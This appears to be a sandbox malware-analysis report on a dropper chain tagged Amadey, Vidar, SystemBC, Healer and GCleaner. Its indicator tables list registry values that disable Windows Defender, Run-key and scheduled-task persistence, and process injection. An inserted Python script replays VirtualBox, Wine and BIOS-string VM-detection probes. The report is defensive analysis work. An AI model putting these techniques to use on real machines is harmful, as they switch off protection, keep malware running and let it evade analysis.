Analysis Overview
SHA256
f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5
Threat Level: Known bad
The file f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5 was found to be: Known bad.
Malicious Activity Summary
SystemBC
Modifies Windows Defender notification settings
Vidar
Healer
Modifies Windows Defender Real-time Protection settings
Modifies Windows Defender DisableAntiSpyware settings
Detects Healer, an antivirus disabler dropper
Amadey
Gcleaner family
GCleaner
Modifies Windows Defender TamperProtection settings
Vidar family
Healer family
Detect Vidar Stealer
Amadey family
Systembc family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Uses browser remote debugging
Downloads MZ/PE file
Windows security modification
Reads user/profile data of web browsers
Checks BIOS information in registry
Reads data files stored by FTP clients
Loads dropped DLL
Executes dropped EXE
Reads user/profile data of local email clients
Identifies Wine through registry keys
Checks computer location settings
Unsecured Credentials: Credentials In Files
Checks installed software on the system
Accesses cryptocurrency files/wallets, possible credential harvesting
Looks up external IP address via web service
Adds Run key to start application
AutoIT Executable
Suspicious use of SetThreadContext
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in Windows directory
Unsigned PE
Program crash
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Enumerates system info in registry
Suspicious use of SendNotifyMessage
Suspicious use of FindShellTrayWindow
Delays execution with timeout.exe
Suspicious use of WriteProcessMemory
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Modifies data under HKEY_USERS
Checks processor information in registry
Modifies system certificate store
Modifies Internet Explorer settings
Scheduled Task/Job: Scheduled Task
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2025-02-24 13:38
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2025-02-24 13:38
Reported
2025-02-24 13:41
Platform
win7-20240903-en
Max time kernel
149s
Max time network
149s
Command Line
Signatures
Amadey
Amadey family
Detect Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects Healer, an antivirus disabler dropper
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
GCleaner
Gcleaner family
Healer
Healer family
Modifies Windows Defender DisableAntiSpyware settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE | N/A |
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE | N/A |
Modifies Windows Defender TamperProtection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE | N/A |
Modifies Windows Defender notification settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications | C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" | C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE | N/A |
SystemBC
Systembc family
Vidar
Vidar family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1091744001\728eb8fad7.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1091755001\Hdn6gzf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1091745001\fefef60740.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1091756001\Hdn6gzf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\ProgramData\rwhkbvh\apitlt.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| N/A | N/A | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| N/A | N/A | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
Uses browser remote debugging
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091745001\fefef60740.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091755001\Hdn6gzf.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091756001\Hdn6gzf.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\rwhkbvh\apitlt.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\rwhkbvh\apitlt.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091744001\728eb8fad7.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091744001\728eb8fad7.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091745001\fefef60740.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091756001\Hdn6gzf.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091755001\Hdn6gzf.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1091744001\728eb8fad7.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1091745001\fefef60740.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1091756001\Hdn6gzf.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine | C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine | C:\ProgramData\rwhkbvh\apitlt.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1091755001\Hdn6gzf.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe | N/A |
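The three registry probes tabled above (the ACPI DSDT key named VBOX__, the per-user Software\Wine key, and the SystemBiosVersion/VideoBiosVersion values under HARDWARE\DESCRIPTION\System) are the usual low-cost VM and emulator checks: the DSDT key exists only when the guest's ACPI tables carry VirtualBox's OEM ID, Software\Wine exists only under Wine, and stock hypervisor firmware reports its vendor in the BIOS version strings. The script below replays those probes against a registry snapshot. It is an added example, not code from this report or from any of the families it names; the vendor marker list is an assumption (the report shows the queries, not what the payloads compare them against), the two snapshots are constructed rather than captured, and the live snapshot via winreg is only for running it on a Windows host.

```python
"""Replay the registry-based VM/emulator probes listed in the report against a
registry snapshot. Added example; not code from the report or the families in it."""
import sys
from typing import Dict, List, Optional

# Keys and values the dropped payloads opened or queried (from the report rows).
VBOX_ACPI_KEY = r"HKLM\HARDWARE\ACPI\DSDT\VBOX__"
WINE_KEY = r"HKCU\Software\Wine"
BIOS_VALUES = [
    r"HKLM\HARDWARE\DESCRIPTION\System\SystemBiosVersion",
    r"HKLM\HARDWARE\DESCRIPTION\System\VideoBiosVersion",
]
# Vendor markers that stock hypervisor firmware puts in the BIOS version strings.
# Assumption: the report shows the queries, not what the payloads compare against.
VM_MARKERS = ("VBOX", "VIRTUALBOX", "VMWARE", "QEMU", "BOCHS", "XEN", "HYPER-V", "PARALLELS")


def probe_registry(snapshot: Dict[str, Optional[str]]) -> List[str]:
    """Return the probes that fire on `snapshot`.

    `snapshot` maps a key or value path to its data: a key that exists maps to "",
    a value maps to its string data (REG_MULTI_SZ joined with spaces), and a key
    or value that does not exist has no entry at all."""
    hits: List[str] = []
    if VBOX_ACPI_KEY in snapshot:          # ACPI DSDT table with OEM ID VBOX__
        hits.append("acpi-dsdt-vbox")
    if WINE_KEY in snapshot:               # created by Wine, never by real Windows
        hits.append("wine")
    for path in BIOS_VALUES:
        data = snapshot.get(path)
        if data and any(marker in data.upper() for marker in VM_MARKERS):
            hits.append("bios-string:" + path.rsplit("\\", 1)[1])
    return hits


def live_snapshot() -> Dict[str, Optional[str]]:
    """Take the same snapshot from the local registry (Windows only, via winreg)."""
    if sys.platform != "win32":
        raise RuntimeError("live_snapshot() needs the Windows registry")
    import winreg
    hives = {"HKLM": winreg.HKEY_LOCAL_MACHINE, "HKCU": winreg.HKEY_CURRENT_USER}
    snap: Dict[str, Optional[str]] = {}
    for key in (VBOX_ACPI_KEY, WINE_KEY):
        hive, sub = key.split("\\", 1)
        try:
            winreg.CloseKey(winreg.OpenKey(hives[hive], sub))
            snap[key] = ""
        except OSError:
            pass                           # key absent: leave it out of the snapshot
    for path in BIOS_VALUES:
        hive, rest = path.split("\\", 1)
        sub, name = rest.rsplit("\\", 1)
        try:
            with winreg.OpenKey(hives[hive], sub) as handle:
                data, _ = winreg.QueryValueEx(handle, name)
        except OSError:
            continue
        snap[path] = " ".join(data) if isinstance(data, list) else str(data)
    return snap


# Constructed snapshots, not captured data: a stock VirtualBox guest and a guest
# whose DSDT OEM ID and firmware strings were changed before use as a sandbox.
STOCK_VBOX_GUEST = {
    VBOX_ACPI_KEY: "",
    BIOS_VALUES[0]: "VBOX   - 1",
    BIOS_VALUES[1]: "Oracle VM VirtualBox Version 6.1 VGA BIOS",
}
PATCHED_GUEST = {
    BIOS_VALUES[0]: "DELL   - 1072009",
    BIOS_VALUES[1]: "Hardware Version 0.0",
}

if __name__ == "__main__":
    for label, snap in (("stock VirtualBox guest", STOCK_VBOX_GUEST),
                        ("patched guest", PATCHED_GUEST)):
        print(f"{label}: {probe_registry(snap) or 'no VM indicators'}")
    if sys.platform == "win32":
        print(f"this host: {probe_registry(live_snapshot()) or 'no VM indicators'}")
```

Most of the dropped payloads in this report open the VBOX__ key, so a sandbox that keeps VirtualBox's default DSDT OEM ID and firmware strings is liable to see payloads exit before the behaviour that matters is recorded; the "patched guest" snapshot shows what the probes return once those strings are changed.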
Loads dropped DLL
Reads data files stored by FTP clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Windows security modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features | C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1091694021\\am_no.cmd" | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\dbf56223ab.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1091693101\\dbf56223ab.exe" | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
Checks installed software on the system
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1740 set thread context of 2820 | N/A | C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe | C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe |
| PID 2880 set thread context of 2264 | N/A | C:\Users\Admin\AppData\Local\Temp\1091744001\728eb8fad7.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
| PID 2652 set thread context of 1548 | N/A | C:\Users\Admin\AppData\Local\Temp\1091745001\fefef60740.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
| PID 2468 set thread context of 2000 | N/A | C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe | C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\skotes.job | C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe | N/A |
| File created | C:\Windows\Tasks\Test Task17.job | C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091747001\ff28c3aaec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091693101\dbf56223ab.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091744001\728eb8fad7.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091755001\Hdn6gzf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
